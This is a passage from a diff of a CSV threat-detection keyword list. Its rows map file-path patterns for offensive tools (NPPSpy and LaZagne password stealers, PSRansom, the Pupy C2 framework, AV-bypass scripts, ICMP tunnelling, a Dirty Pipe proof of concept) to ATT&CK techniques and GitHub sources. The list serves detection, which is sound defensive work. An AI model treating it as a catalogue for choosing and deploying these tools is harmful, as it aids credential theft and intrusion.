The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*/pspy.git*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/pspy.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/pspy/cmd*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/pspy32*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/pspy64*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - 
TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/pspy.git*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy/cmd*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy32*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/pspy64*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/PSRansom 
-*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" -"*/psscanner.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4029","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" -"*/PSSW100AVB*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","983","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" -"*/pswRecovery4Moz.txt*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/psscanner.go*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" +"*/PSSW100AVB*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*/pswRecovery4Moz.txt*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*/ptunnel-ng*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "*/puckiestyle/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/puppet-naivesigning.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/pupwinutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/commands/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/memimporter/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/output/pupyx64*.exe*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupy_load.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyCmd.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyCompile.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupylib/payloads/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyOffload.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupyps.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyServer.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyService.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/pupysh.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyTriggers.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/PupyWeb.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupwinutils/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/commands/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/memimporter/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/output/pupyx64*.exe*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy_load.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyCmd.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyCompile.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - 